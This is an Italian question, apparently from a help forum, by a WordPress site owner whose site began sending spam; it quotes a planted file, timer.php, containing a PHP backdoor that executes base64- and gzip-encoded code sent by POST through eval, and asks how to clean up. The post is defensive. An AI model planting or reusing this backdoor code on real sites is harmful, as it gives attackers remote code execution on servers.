Improvvisamente uno dei nostri siti web Wordpress ha iniziato a inviare e-mail di spam ed è stato inserito nella lista nera su MXToolBox. Quindi con il supporto del server ho scansionato i file e trovato uno strano file chiamato timer.php
contenente il seguente blocco di codice:
if (isset($_REQUEST["q"]) AND $_REQUEST["q"]=="1")
{echo "200"; exit;}
if(isset($_POST["key"]) && isset($_POST["chk"]) && $_POST["key"]=="some code")
eval(gzuncompress(base64_decode($_POST["chk"])));
Dopo alcune ricerche online ho scoperto che questo è dannoso e una backdoor. Quali sono le azioni raccomandate che dovrei prendere per mitigare questo? Cancellare il file sarebbe sufficiente?